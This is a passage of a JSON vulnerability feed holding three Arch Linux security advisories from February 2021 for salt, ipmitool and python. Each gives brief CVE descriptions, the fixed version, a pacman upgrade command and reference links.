"AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28243", "CVE-2020-28972", "CVE-2020-35662", "CVE-2021-25281", "CVE-2021-25282", "CVE-2021-25283", "CVE-2021-25284", "CVE-2021-3144", "CVE-2021-3148", "CVE-2021-3197"], "description": "Arch Linux Security Advisory ASA-202102-33\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2020-28243 CVE-2020-28972 CVE-2020-35662 CVE-2021-3144\nCVE-2021-3148 CVE-2021-3197 CVE-2021-25281 CVE-2021-25282\nCVE-2021-25283 CVE-2021-25284\nPackage : salt\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1624\n\nSummary\n=======\n\nThe package salt before version 3002.5-3 is vulnerable to multiple\nissues including access restriction bypass, arbitrary command\nexecution, certificate verification bypass, cross-site scripting,\ninsufficient validation, privilege escalation, directory traversal and\ninformation disclosure.\n\nResolution\n==========\n\nUpgrade to 
3002.5-3.\n\n# pacman -Syu \"salt>=3002.5-3\"\n\nThe problems have been fixed upstream in version 3002.5.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-28243 (privilege escalation)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The minion's\nrestartcheck is vulnerable to command injection via a crafted process\nname. This allows for a local privilege escalation by any user able to\ncreate files on the minion in a non-blacklisted directory.\n\n- CVE-2020-28972 (certificate verification bypass)\n\nIn SaltStack Salt before 3002.5, authentication to VMware vcenter,\nvsphere, and esxi servers (in the vmware.py files) does not always\nvalidate the SSL/TLS certificate.\n\n- CVE-2020-35662 (certificate verification bypass)\n\nIn SaltStack Salt before 3002.5, when authenticating to services using\ncertain modules, the SSL certificate is not always validated.\n\n- CVE-2021-3144 (insufficient validation)\n\nIn SaltStack Salt before 3002.5, eauth tokens can be used once after\nexpiration. (They might be used to run commands against the salt master\nor minions.)\n\n- CVE-2021-3148 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 3002.5. Sending\ncrafted web requests to the Salt API can result in\nsalt.utils.thin.gen_thin() command injection because of different\nhandling of single versus double quotes. This is related to\nsalt/utils/thin.py.\n\n- CVE-2021-3197 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The salt-api's\nssh client is vulnerable to a shell injection by including ProxyCommand\nin an argument, or via ssh_options provided in an API request.\n\n- CVE-2021-25281 (access restriction bypass)\n\nAn issue was discovered in SaltStack Salt before 3002.5. salt-api does\nnot honor eauth credentials for the wheel_async client. 
Thus, an\nattacker can remotely run any wheel modules on the master.\n\n- CVE-2021-25282 (directory traversal)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The\nsalt.wheel.pillar_roots.write method is vulnerable to directory\ntraversal.\n\n- CVE-2021-25283 (cross-site scripting)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The jinja\nrenderer does not protect against server side template injection\nattacks.\n\n- CVE-2021-25284 (information disclosure)\n\nAn issue was discovered in SaltStack Salt before 3002.5.\nsalt.modules.cmdmod can log credentials to the info or error log level.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/\nhttps://security.archlinux.org/CVE-2020-28243\nhttps://security.archlinux.org/CVE-2020-28972\nhttps://security.archlinux.org/CVE-2020-35662\nhttps://security.archlinux.org/CVE-2021-3144\nhttps://security.archlinux.org/CVE-2021-3148\nhttps://security.archlinux.org/CVE-2021-3197\nhttps://security.archlinux.org/CVE-2021-25281\nhttps://security.archlinux.org/CVE-2021-25282\nhttps://security.archlinux.org/CVE-2021-25283\nhttps://security.archlinux.org/CVE-2021-25284\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-33", "href": "https://security.archlinux.org/ASA-202102-33", "type": "archlinux", "title": "[ASA-202102-33] salt: multiple issues", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-5208"], "description": "Arch Linux Security Advisory ASA-202102-39\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2020-5208\nPackage : ipmitool\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1596\n\nSummary\n=======\n\nThe package ipmitool before version 1.8.18-7 is vulnerable to arbitrary\ncode 
execution.\n\nResolution\n==========\n\nUpgrade to 1.8.18-7.\n\n# pacman -Syu \"ipmitool>=1.8.18-7\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIt's been found that multiple functions in ipmitool before 1.8.19\nneglect proper checking of the data received from a remote LAN party,\nwhich may lead to buffer overflows and potentially to remote code\nexecution on the ipmitool side. This is especially dangerous if\nipmitool is run as a privileged user. This problem is fixed in version\n1.8.19.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/69708\nhttps://github.com/ipmitool/ipmitool/security/advisories/GHSA-g659-9qxw-p7cp\nhttps://github.com/ipmitool/ipmitool/commit/e824c23316ae50beb7f7488f2055ac65e8b341f2\nhttps://github.com/ipmitool/ipmitool/commit/840fb1cbb4fb365cb9797300e3374d4faefcdb10\nhttps://github.com/ipmitool/ipmitool/commit/41d7026946fafbd4d1ec0bcaca3ea30a6e8eed22\nhttps://github.com/ipmitool/ipmitool/commit/9452be87181a6e83cfcc768b3ed8321763db50e4\nhttps://github.com/ipmitool/ipmitool/commit/d45572d71e70840e0d4c50bf48218492b79c1a10\nhttps://github.com/ipmitool/ipmitool/commit/7ccea283dd62a05a320c1921e3d8d71a87772637\nhttps://security.archlinux.org/CVE-2020-5208\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-39", "href": "https://security.archlinux.org/ASA-202102-39", "type": "archlinux", "title": "[ASA-202102-39] ipmitool: arbitrary code execution", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23336", "CVE-2021-3177"], "description": "Arch Linux Security Advisory ASA-202102-37\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2021-3177 CVE-2021-23336\nPackage : python\nType : multiple issues\nRemote : Yes\nLink : 
https://security.archlinux.org/AVG-1465\n\nSummary\n=======\n\nThe package python before version 3.9.2-1 is vulnerable to multiple\nissues including arbitrary code execution and url request injection.\n\nResolution\n==========\n\nUpgrade to 3.9.2-1.\n\n# pacman -Syu \"python>=3.9.2-1\"\n\nThe problems have been fixed upstream in version 3.9.2.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-3177 (arbitrary code execution)\n\nPython 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in\n_ctypes/callproc.c, which may lead to remote code execution in certain\nPython applications that accept floating-point numbers as untrusted\ninput, as demonstrated by a 1e300 argument to c_double.from_param. This\noccurs because sprintf is used unsafely.\n\n- CVE-2021-23336 (url request injection)\n\nThe package python/cpython from 0 and before 3.6.13, from 3.7.0 and\nbefore 3.7.10, from 3.8.0 and before 3.8.8, from 3.9.0 and before 3.9.2\nare vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and\nurllib.parse.parse_qs by using a vector called parameter cloaking. When\nthe attacker can separate query parameters using a semicolon (;), they\ncan cause a difference in the interpretation of the request between the\nproxy (running with default configuration) and the server. This can\nresult in malicious requests being cached as completely safe ones, as\nthe proxy would usually not see the semicolon as a separator, and\ntherefore would not include it in a cache key of an unkeyed parameter.\n\nThe package python-django contains a copy of urllib.parse.parse_qsl()\nwhich was added to backport some security fixes. 
A further security fix\nhas been issued in versions 3.1.7, 3.0.13 and 2.2.19 such that\nparse_qsl() no longer allows using ; as a query parameter separator by\ndefault.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://python-security.readthedocs.io/vuln/ctypes-buffer-overflow-pycarg_repr.html\nhttps://bugs.python.org/issue42938\nhttps://github.com/python/cpython/pull/24239\nhttps://github.com/python/cpython/commit/c347cbe694743cee120457aa6626712f7799a932\nhttps://snyk.io/vuln/SNYK-UPSTREAM-PYTHONCPYTHON-1074933\nhttps://snyk.io/blog/cache-poisoning-in-popular-open-source-packages/\nhttps://bugs.python.org/issue42967\nhttps://github.com/python/cpython/pull/24297\nhttps://github.com/python/cpython/commit/c9f07813ab8e664d8c34413c4fc2d4f86c061a92\nhttps://www.djangoproject.com/weblog/2021/feb/19/security-releases/\nhttps://github.com/django/django/commit/8f6d431b08cbb418d9144b976e7b972546607851\nhttps://security.archlinux.org/CVE-2021-3177\nhttps://security.archlinux.org/CVE-2021-23336\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-37", "href": "https://security.archlinux.org/ASA-202102-37", "type": "archlinux", "title": "[ASA-202102-37] python: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}